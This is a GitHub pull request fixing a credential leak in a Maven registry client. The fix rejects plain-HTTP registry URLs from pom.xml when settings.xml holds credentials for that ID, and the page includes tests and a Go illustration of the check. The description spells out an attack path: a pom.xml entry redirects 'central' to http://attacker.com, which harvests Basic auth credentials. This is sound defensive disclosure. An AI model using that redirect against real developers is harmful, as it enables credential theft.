clients/datasource: reject non-HTTPS Maven registry URLs when credentials configured #1931
Open
djvirus9 wants to merge 2 commits into google:main from
Conversation
…ials configured

AddRegistry() and updateDefaultRegistry() now return an error when an attacker-supplied pom.xml attempts to redirect a registry ID that has credentials configured in settings.xml to a non-HTTPS URL.

Root cause: pom.xml can declare a <repository> with any <id> and <url>. If the id matches a server entry in ~/.m2/settings.xml, AddRegistry() would accept the http:// URL, and the client would later respond to a 401 challenge by sending the victim's credentials in plaintext to the attacker-controlled endpoint.

The fix checks whether credentials are configured for the incoming registry ID. If they are, any non-HTTPS and non-artifactregistry URL is rejected with a descriptive error before the registry is accepted.

Fixes: google#1877
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request.

Author
@googlebot I have signed the CLA! Please recheck.

Author
@googlebot I have signed the CLA on 21st March, 2026
Description:
Fixes #1877
What this fixes
AddRegistry() and updateDefaultRegistry() accept any URL from pom.xml without validating the scheme. If a victim has credentials configured in ~/.m2/settings.xml for a registry ID (e.g. central), an attacker-controlled pom.xml can redirect that ID to an http:// endpoint. The client then responds to a 401 challenge by sending the victim's credentials in plaintext.
Attack path:

1. `<repository><id>central</id><url>http://attacker.com</url>` in the attacker-controlled pom.xml
2. AddRegistry() accepts the http URL, overriding the trusted registry for "central"
3. registryAuths["central"] from settings.xml
4. `WWW-Authenticate: Basic`
5. `Authorization: Basic <base64(user:pass)>` → credentials stolen

Fix
Before accepting a registry URL, check whether credentials are configured for that
registry ID. If they are, reject any non-HTTPS (and non-artifactregistry) scheme with a
descriptive error.
Tests
Added three tests in maven_registry_auth_test.go:

- TestAddRegistryRejectsHTTPWhenCredentialsConfigured
- TestUpdateDefaultRegistryRejectsHTTPWhenCredentialsConfigured
- TestAddRegistryAllowsHTTPSWhenCredentialsConfigured
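As an added example (not the PR's diff and not the project's own code), the check described under "Fix" written out in Go against constructed types. The names `registryAuth`, `registryOverride`, `validateRegistryURL`, `applyOverrides` and `ErrInsecureRegistry` are assumptions for this illustration, not the project's identifiers; only the rule itself (a registry ID with credentials may only be pointed at an `https://` or `artifactregistry://` URL) and the `central` / settings.xml scenario come from the PR. The sample registries, URLs and credentials in `main` are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// registryAuth holds the credentials for one registry ID, as they would be
// read from a <server> entry in ~/.m2/settings.xml. Constructed type.
type registryAuth struct {
	Username string
	Password string
}

// registryOverride is one <repository> declaration from a pom.xml. Constructed type.
type registryOverride struct {
	ID  string
	URL string
}

// ErrInsecureRegistry is returned when a pom.xml tries to point a registry that
// has credentials at a scheme over which those credentials would be sent in clear.
var ErrInsecureRegistry = errors.New("registry with credentials must use https or artifactregistry")

// validateRegistryURL applies the rule from the PR description: if credentials
// are configured for id, only https:// and artifactregistry:// URLs are accepted.
// A registry ID with no credentials is not restricted by this check.
func validateRegistryURL(id, rawURL string, auths map[string]registryAuth) error {
	if _, hasCreds := auths[id]; !hasCreds {
		return nil
	}
	u, err := url.Parse(rawURL)
	if err != nil {
		return fmt.Errorf("registry %q: invalid URL %q: %w", id, rawURL, err)
	}
	// A relative or scheme-less URL has an empty scheme and is rejected too.
	switch strings.ToLower(u.Scheme) {
	case "https", "artifactregistry":
		return nil
	default:
		return fmt.Errorf("registry %q: %w (got %q)", id, ErrInsecureRegistry, rawURL)
	}
}

// applyOverrides returns a copy of base with only the pom.xml overrides that pass
// validateRegistryURL applied, plus the errors for the ones that were rejected,
// so a caller can surface them as descriptive errors rather than silently dropping them.
func applyOverrides(base map[string]string, overrides []registryOverride, auths map[string]registryAuth) (map[string]string, []error) {
	out := make(map[string]string, len(base))
	for k, v := range base {
		out[k] = v
	}
	var rejected []error
	for _, o := range overrides {
		if err := validateRegistryURL(o.ID, o.URL, auths); err != nil {
			rejected = append(rejected, err)
			continue
		}
		out[o.ID] = o.URL
	}
	return out, rejected
}

func main() {
	// Constructed sample: the victim has a "central" <server> entry in settings.xml.
	auths := map[string]registryAuth{"central": {Username: "user", Password: "pass"}}
	base := map[string]string{"central": "https://repo.maven.apache.org/maven2"}
	overrides := []registryOverride{
		{ID: "central", URL: "http://attacker.example/maven2"},    // rejected: creds + http
		{ID: "central", URL: "https://mirror.example/maven2"},     // accepted: creds + https
		{ID: "snapshots", URL: "http://internal.example/snapshots"}, // accepted: no creds
	}
	final, rejected := applyOverrides(base, overrides, auths)
	for _, err := range rejected {
		fmt.Println("rejected:", err)
	}
	fmt.Println("registries:", final)
}
```

The rejection is returned rather than logged so that, as in the PR, `AddRegistry()` can fail before the registry is accepted; a registry that never had credentials is deliberately left alone, since the risk being closed is credential disclosure, not plain-HTTP downloads in general.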